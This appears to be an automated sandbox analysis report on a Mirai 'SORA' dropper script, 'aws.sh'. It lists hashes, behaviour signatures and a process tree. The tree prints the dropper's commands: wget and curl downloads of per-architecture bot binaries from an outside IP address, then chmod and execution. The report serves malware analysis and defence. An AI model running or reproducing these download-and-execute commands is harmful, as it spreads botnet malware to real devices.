Analysis
-
max time kernel
19s -
max time network
20s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
08/04/2025, 09:27
Static task
static1
Behavioral task
behavioral1
Sample
aws.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aws.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
aws.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
aws.sh
-
Size
2KB
-
MD5
66679e7bee1bd19878857326ec90d7ba
-
SHA1
e0a878bdebbec2d81d38caa2407e9ee42d659f3f
-
SHA256
9c0a7f8fc7658b93dcf2f92d2afe4beface33a8cff5f34539887244ac8812ce5
-
SHA512
95c539a9a2adbef1ce327d6d9f5ef4f529c345801331ea3c9901dbcf0fe25ab3939bb6a267445d3cbe03e8df67901e2043fc6a4b3db1333169e9de83d62bac55
Malware Config
Extracted
mirai
SORA
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 830 chmod 697 chmod 720 chmod 749 chmod 771 chmod 796 chmod 801 chmod 806 chmod 811 chmod 680 chmod 739 chmod 789 chmod 817 chmod 824 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 681 aws.sh /tmp/robben 699 aws.sh /tmp/robben 721 aws.sh /tmp/robben 740 aws.sh /tmp/robben 750 aws.sh /tmp/robben 773 aws.sh /tmp/robben 790 aws.sh /tmp/robben 797 aws.sh /tmp/robben 802 aws.sh /tmp/robben 807 aws.sh /tmp/robben 812 aws.sh /tmp/robben 818 aws.sh /tmp/robben 825 aws.sh /tmp/robben 831 aws.sh -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-7.dat upx -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/exe robben File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 684 wget 685 curl 696 cat -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/robben aws.sh
Processes
-
/tmp/aws.sh/tmp/aws.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:647 -
/usr/bin/wgetwget http://178.149.240.69/bins/sora.x862⤵
- Writes file to tmp directory
PID:649
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:669
-
-
/bin/catcat sora.x862⤵PID:679
-
-
/bin/chmodchmod +x aws.sh robben sora.x86 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/robben./robben aws.exploit2⤵PID:681
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:684
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:685
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:696
-
-
/bin/chmodchmod +x aws.sh robben sora.mips sora.x86 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/robben./robben aws.exploit2⤵PID:699
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:709
-
-
/bin/catcat sora.x86_642⤵PID:718
-
-
/bin/chmodchmod +x aws.sh robben sora.mips sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/robben./robben aws.exploit2⤵PID:721
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.i4682⤵PID:724
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/catcat sora.i4682⤵PID:738
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.mips sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/robben./robben aws.exploit2⤵PID:740
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.i6862⤵
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/catcat sora.i6862⤵PID:748
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/robben./robben aws.exploit2⤵PID:750
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:752
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/catcat sora.mpsl2⤵PID:770
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/robben./robben aws.exploit2⤵PID:773
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.arm42⤵PID:775
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/catcat sora.arm42⤵PID:787
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/robben./robben aws.exploit2⤵PID:790
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.arm52⤵
- Writes file to tmp directory
PID:791
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/catcat sora.arm52⤵PID:795
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/robben./robben aws.exploit2⤵PID:797
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.arm62⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/catcat sora.arm62⤵PID:800
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/robben./robben aws.exploit2⤵
- Reads runtime system information
PID:802
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.arm72⤵
- Writes file to tmp directory
PID:803
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/catcat sora.arm72⤵PID:805
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/robben./robben aws.exploit2⤵
- Reads runtime system information
PID:807
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:808
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/catcat sora.ppc2⤵PID:810
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/robben./robben aws.exploit2⤵PID:812
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.ppc440fp2⤵PID:814
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/catcat sora.ppc440fp2⤵PID:816
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/robben./robben aws.exploit2⤵PID:818
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/catcat sora.m68k2⤵PID:823
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/robben./robben aws.exploit2⤵PID:825
-
-
/usr/bin/wgetwget http://178.149.240.69/bins/sora.sh42⤵
- Writes file to tmp directory
PID:827
-
-
/usr/bin/curlcurl -O http://178.149.240.69/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/catcat sora.sh42⤵PID:829
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_64 systemd-private-90c74fae036646178caa7403d30e5a35-systemd-timedated.service-n53NPR2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/robben./robben aws.exploit2⤵PID:831
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5c665be249de8aacbf7f020710556850f
SHA17bf15fe8983c1a7304ecb626385fd8d656657750
SHA256c70c7d6288ddd3de1e999fef3e15a4cb7d23656de44209d834ea08c97f26f2c3
SHA5122125eacc929f9f6ab5232960153e3a3c2d554cd3f65fa7fb97324a275ce27034621999f2922aaa2a4beeeda75d09b2ff89aab6417e2f93329f56ce2529cd14d8
-
Filesize
28KB
MD5cb095025fabaf4935e7cde669f9b83cb
SHA1f057ff497853eac9b47772ae58a6be561c16edf7
SHA256d0a729eda4e98c132a68864f1feb9f2676840909d2584c4e8225ac058af1581f
SHA512e4df6b3d5de8f2e09c31321931f471b2acf08f24457ac13c59aa24ede5e579db85c07cd447015ddfcf00be0d828277c03598bb732aad9e4928f83c54b7a18739
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5659a441fb5d03828d0e1dcdc8e94515c
SHA1bf70af5209d2a89bd12c9a9d4b148ddd9b4af02f
SHA2560e878390d0a19156525789562bacf861294b18a9308312e4a9c943d6e900ff44
SHA51225d5d73027f64202338f40ae6ee71b12fa64db01e5b82afe2a3bb7abb415c19246b4368ddb1f98041a439155cadafd7eb7894e67eb31d84f205acc62b70d6cb8
-
Filesize
64KB
MD5d3114b8b81fe0dabf36ebb38e3f69ffe
SHA1ef38c94966a0649c3797af3adb5287c887ef122a
SHA2562d760402220357d43f57edbef3d9e8d9f0526a6c677b4cb77dd63eaceb6f67d1
SHA512d43b02f9ca7a489270f552c1a89b3c6d36270fa06090a9cdfe64f506ac3d0eb344de161a25c639128ac66ac77573b389087f36939177f3cc189ec39a23addc72
-
Filesize
27KB
MD5ed0134170c819d0a2c3526f5ed8ecad5
SHA1af1324bb6e6554b496e5938185f74456b69e54e1
SHA256cd67a9db1c069d8a9ee68a76c68d20c53659d319425ecabf8a0c5b193aeb6fe8
SHA51298ebd8a6a42f7c3a324cacc429d27fdd5cecf9995971adefdef184e15926741263a19429fa2966a4ced0d00fa715a36028e23b8e7cf5a5e0e567296d34b56ab6